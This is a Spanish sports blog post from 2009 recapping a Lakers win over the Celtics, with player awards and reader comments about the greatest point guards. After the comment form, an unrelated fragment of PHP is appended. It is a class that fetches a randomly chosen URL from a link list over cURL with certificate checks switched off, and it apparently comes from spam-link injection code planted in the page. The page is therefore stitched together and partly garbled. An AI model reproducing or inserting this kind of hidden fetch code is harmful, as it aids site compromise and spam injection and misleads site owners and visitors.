La crónica (05/02/2009)

06 de February de 2009 por TheDeerHunter

La jornada de ayer estaba marcada en rojo en el calendario de un gran número de aficionados al baloncesto de todo el mundo. Tras los precedentes de las finales pasadas y el día de Navidad unidos a las trayectorias de ambas franquicias, se hace difícil imaginar en este momento un choque con tantos y tan jugosos alicientes como éste. Bromas, ninguna… y eso ya es mucho para un partido de la regular.

Los Celtics, acumulando otra espectacular racha de victorias pero con Garnett algo debilitado por la gripe recién sufrida, recibían a unos Lakers sin Bynum. Decir que tras el último partidazo perdido en el Staples esperaban con más ganas a sus rivales es de perogrullo. La rivalidad viene de décadas.

El evento no decepcionó. Nivel de Playoffs durante 2h y 54 minutos, prórroga incluida. No supieron o no pudieron los verdes cerrar el partido en el tiempo reglamentario aún cuando lo tuvieron en su mano. Para bien y para mal hay pocos equipos que estén tan entrenados para jugar en el filo de la navaja como estos Lakers y, además, existen sutiles diferencias cuando te defiende Kobe o Thaddeus Young en la jugada decisiva. Sin Garnett en pista con problemas de faltas todo el partido, Gasol & Odom recuperaron viejas sensaciones formando el dúo letal del final de la regular pasada, tanto en ataque como en defensa. Dos tapones del de Sant Boi en el último minuto terminaron decantando la victoria para los visitantes. Victoria que sabe el doble de bien… o más. Y da mucha moral a los Lakers para la visita a Cleveland el domingo, y quién sabe si para las próximas finales.

El resto de la jornada, como es natural, resultó mucho más deslucida. Deron Williams se salió por fin en la victoria de Utah contra un extraño planteamiento coral de Dallas: toda la plantilla jugando más de 10 minutos y, obviamente, perdiendo con paliza. Korver, de titular y jugando bien. Los Jazz vuelven a meterse en la pomada, lo que debería preocupar y mucho a los Suns.

Brand se perderá el resto de la temporada, lo que ya no sabemos si es una buena o mala noticia para los Sixers, que sin él apenas fallan nunca. Anoche le tocó a Indiana, que no levanta cabeza.

En otro orden de cosas, Orlando ha traspasado a Bogans a cambio de Tyronne Lue… y las leves esperanzas de Sergio de salir en aquella dirección se esfuman.

PREMIOS

MVP:El partido de Gasol de ayer fue mayúsculo (y ya van 3 seguidos) pero hoy debemos rendirnos a los pies de Deron Williams que le dio un baño brutal a un Jason Kidd que ya vislumbra totalmente el ocaso de su carrera. 34 puntos, 12 puntos, 5 rebotes para el de los Jazz.

Rookie: ¡Cómo aprovecha los minutos Hibbert! Ayer 8 puntos y 7 rebotes en apenas 12 minutos. Viendo el destrozo que les causó Dalembert a los Pacers a lo mejor el rookie podría haber jugado algo más.

Sorpresa: La temporada que venía realizando Samuel Dalembert se podía calificar, siendo benévolos, como decepcionante pero increíblemente ayer recibió toda la inspiración que se le había negado en días anteriores y se fue hasta los 18 puntos y ¡20 rebotes!

Decepción: ¡Qué manera más triste de romper una racha de 4 victorias consecutivas la de Dallas! Entre Josh Howard, Dirk Nowitzki, Jason Terry y Jason Kidd tan solo fueron capaces de anotar 20 canastas de 57 intentos.

El mayor esfuerzo en vano: Los Celtics se defendieron como gato panza arriba y principalmente Rajon Rondo, que se quedó a las puerdas del triple doble con 16 puntos, 8 rebotes y 12 asistencias. Al final… agua.

La pregunta del día: Parece confirmarse que estamos ante la primera temporada del declive de los, posiblemente, dos mejores bases de los últimos tiempos: Steve Nash y Jason Kidd. ¿En qué lugar de la historia los colocaríais?

Comenta

7 comentarios a esta entrada

  1. couxe dice:
    #1

    Yo es que en Nash no veo declive, sencillamente veo que su equipo ha dejado de jugar como a él le viene bien, y por tanto sus números se han reducido. De los 90 tiros por partido que promediaban los Suns en la temporada anterior, han pasado a 78 en esta… Extrapolando estos datos al director de juego del equipo, sus números se han reducido en la proporción exacta, por lo que, como digo no veo declive…

    Sin embargo, el caso de Jason Kidd es distinto, ya que al margen de su descenso estadístico, ha bajado muchísimo en su capacidad defensiva, una de sus mayores virtudes, y ahora mismo lo suelen torear bastante a menudo, sobre todo en el 1 contra 1.

    En cuanto a su lugar en la historia, veo bastante por delante a Kidd, a pesar de que me gusta muchísimo más el juego de Nash. Posiblemente coloaría a ambos entre los 10 mejores bases de la historia…

      Citar

  2. TheDeerHunter dice:
    #2

    Cerca del final de la temporada pasada, en la ESPN, desarrollaron un estudio bastante detallado acerca de los 10 mejores bases de la historia:
    http://sports.espn.go.com/nba/dailydime?page=dailydime-GreatestPointGuards

    En él se puede observarse la dificultad que tienen esta posición para brillar con luz propia. Se trata de la posición más ligada al rendimiento colectivo y, por tanto, si el colectivo no brilla el base no brilla y, si el colectivo brilla provablemente otros lo hagan más que el base.

    De los 10 primeros que defiende este estudio. Sólo la mitad lograron algún MVP y algunos de ellos ni siquiera lograron un anillo (muy fuerte, para ser los teóricos 10 mejores de toda la historia)

    De todos ellos, Magic y Big ‘O’ por títulos y prestaciones juegan en otra liga… no hay comparación posible con ellos por parte de Kidd y Nash.
    Después tienes a gente como Isiah, Cousy, Frazier, Archibald… todos con varios títulos y con números, podríamos decir similares. Diría que los anillos en su caso desequilibran la balanza sin entrar a discutir los números. Dentro de es grupo habría que incluir ya mismo a Billups.

    A partir de ahí… quedan tres plazas en el top-10 para repartirlas entre Stockton, Payton (vaya por delante que no considero su anillo con el mismo peso que los otros) Kidd, Nash… y seguramente Marc Jackson, Earl Monroe y algún otro que se me escapa…
    La decisión es complicada, sin duda. La meditaré un poquito más

      Citar

  3. TheDeerHunter dice:
    #3

    otros candidatos más: Maurice Cheaks y Lenny Wilkens… que no se nos olviden.

      Citar

  4. Fran Reyes dice:
    #4

    Con respecto al partido de los Lakers, que intentaré ver mañana por la mañana en la redifusión del Canal + HD, me llaman mucho la atención los 21 minutos jugados por Josh Powell. Le ha robado el rol de sustituto de Bynum a Chris Mihm (y a DJ Mbenga, que sigue vivo), mientras que por otra parte también le va comiendo terreno a un Trevor Ariza que ha pasado de ser rival directo de Lamar Odom en el puesto de sexto hombre a jugar tan sólo 10 minutos ayer. Diez minutos, por cierto, donde falló cuatro de los cinco tiros que intentó e hizo tres faltas personales.

      Citar

  5. Jabho dice:
    #5

    Pues derrota de Boston que no supo cerrar el partido, pero que estas cosas importaran muy poco cuando lleguen PO. Ala, no gusta perder.

    Kidd y Nash por edad era normal que bajaran. Curioso, muy pocos jugadores tienen 2 MVP´s y Nash lo tiene, aunque la carrera de Kidd parace más redonda. Ninguno con anillo 🙁

      Citar

  6. Viva_Dirk dice:
    #6

    Si no estamos atentos los kobistas nos la cuelan a la mínima, habrá sutiles diferencias en que te defienda Thaddeus Young o Kobe en la última jugada, pero el que defendia a Ray Allen en el último tiro era Fisher.

    Kobe tuvo un último cuarto muy acertado pero no jugó bien el partido, se dedicó a tirar de fuera sin demasiado acierto, sin provocar faltas ni penetrar demasiado. A parte de eso, de los Lakers me preocupa bastante una cosa que no se ha mejorado nada desde el principio de temporada: la defensa del lado debil, especialmente Vujacic que es bastante intenso en la defensa de 1 contra 1 no se entera de nada.

    Respecto a lo de los bases, solo veo por delante de Stockton a Magic, acepto lo de Robertson porque no lo he visto casi nada y sus números son una pasada. Isiah era la guinda de un equipazo y es el que mas cerca se queda, pero del resto ninguno se acerca al nivel de Stockton.

      Citar

  7. TheDeerHunter dice:
    #7

    No sé porqué te empeñas en etiquetarme de Kobista cuando no lo soy en absoluto.
    La última jugada del último cuarto sí la defendió Kobe y, como casi siempre, de forma magistral… a diferencia de lo que hizo Young el otro día.
    En efecto la última jugada del partido sí la defendió Fisher, que también es un buen defensor.
    Cualquiera de los dos ejemplos me servía para la comparación. Si hubiera sabido que iba a herir tu sensibilidad anti-kobista hubiera elegido la otra. :b

    Acerca de Stockton. Por supuesto es uno de los más grandes. En su contra es que no tiene ningún anillo y además él nunca fué el líder de su equipo, sino que una buena parte de la gran cantidad de asistencias que producía era gracias a tener a un jugador al lado como lo era Karl Malone.
    A Cousy, Frazier, Archibald… no los llegué a conocer en vivo. Pero sí a “Zeke” y él era guinda y líder/mejor jugador de aquel equipazo. En cualquier caso, para mí el haber sido importante en lograr anillos es factor discriminante para este tipo de clasificaciones.

    De los que me quedaban por ubicar, efectivamente para el top-10 me quedaría sin dudarlo con Stockton… y seguramente también con Nash y Kidd. De Payton no puedo olvidar su cagada en L.A. aunque antes de eso también molaba un carro.
    De los MVPs de Nash a mí me parece que el segundo fue injusto… como también fue injusto que no se lo dieran a Kidd en su primera temporada con los Nets. Por ahí veo un empate.

    En definitiva. No sabría decir quien de esos últimos top-3 fue mejor, pero sí quién me ha divertido más: Nash.
    Larga vida al 13.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>